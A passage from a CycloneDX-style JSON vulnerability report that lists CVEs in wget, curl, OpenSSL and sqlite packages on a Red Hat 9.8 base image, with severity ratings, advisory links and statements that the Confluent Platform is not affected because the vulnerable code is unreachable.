          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-10524",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        918
      ],
      "description": "Applications that use Wget to access a remote resource using shorthand URLs and pass arbitrary user credentials in the URL are vulnerable. In these cases attackers can enter crafted credentials which will cause Wget to access an arbitrary host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-10524"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/11/18/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-10524"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/wget.git/commit/?id=c419542d956a2607bbce5df64b9d378a8588d778"
        },
        {
          "url": "https://github.com/advisories/GHSA-mqrm-h2pw-9j9r"
        },
        {
          "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability"
        },
        {
          "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10524"
        },
        {
          "url": "https://seclists.org/oss-sec/2024/q4/107"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250321-0007"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250321-0007/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-10524"
        }
      ],
      "published": "2024-11-19T15:15:06+00:00",
      "updated": "2026-06-17T06:55:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-11053",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "When asked to both use a `.netrc` file for credentials and to follow HTTP\nredirects, curl could leak the password used for the first host to the\nfollowed-to host under certain circumstances.\n\nThis flaw only manifests itself if the netrc file has an entry that matches\nthe redirect target hostname but the entry either omits just the password or\nomits both login and password.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-11053"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/12/11/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1671"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1673"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-11053"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/2339305"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-11053.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-11053.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:1673"
        },
        {
          "url": "https://github.com/advisories/GHSA-h288-5fq8-5pfw"
        },
        {
          "url": "https://hackerone.com/reports/2829063"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-11053.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11053"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0012"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0012/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0003"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0003/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0004"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0004/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7162-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8525-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-11053"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujan2025.html#AppendixMSQL"
        }
      ],
      "published": "2024-12-11T08:15:05+00:00",
      "updated": "2026-06-17T06:56:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-13176",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        385
      ],
      "description": "Issue summary: A timing side-channel which could potentially allow recovering\nthe private key exists in the ECDSA signature computation.\n\nImpact summary: A timing side-channel in ECDSA signature computations\ncould allow recovering the private key by an attacker. However, measuring\nthe timing would require either local access to the signing application or\na very fast network connection with low latency.\n\nThere is a timing signal of around 300 nanoseconds when the top word of\nthe inverted ECDSA nonce value is zero. This can happen with significant\nprobability only for some of the supported elliptic curves. In particular\nthe NIST P-521 curve is affected. To be able to measure this leak, the attacker\nprocess must either be located in the same physical computer or must\nhave a very fast network connection with low latency. For that reason\nthe severity of this vulnerability is Low.\n\nThe FIPS modules in 3.4, 3.3, 3.2, 3.1 and 3.0 are affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-13176"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/01/20/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:15699"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:16046"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-13176"
        },
        {
          "url": "https://bugzilla.redhat.com/2359885"
        },
        {
          "url": "https://bugzilla.redhat.com/2359888"
        },
        {
          "url": "https://bugzilla.redhat.com/2359892"
        },
        {
          "url": "https://bugzilla.redhat.com/2359894"
        },
        {
          "url": "https://bugzilla.redhat.com/2359895"
        },
        {
          "url": "https://bugzilla.redhat.com/2359899"
        },
        {
          "url": "https://bugzilla.redhat.com/2359900"
        },
        {
          "url": "https://bugzilla.redhat.com/2359902"
        },
        {
          "url": "https://bugzilla.redhat.com/2359903"
        },
        {
          "url": "https://bugzilla.redhat.com/2359911"
        },
        {
          "url": "https://bugzilla.redhat.com/2359918"
        },
        {
          "url": "https://bugzilla.redhat.com/2359920"
        },
        {
          "url": "https://bugzilla.redhat.com/2359924"
        },
        {
          "url": "https://bugzilla.redhat.com/2359928"
        },
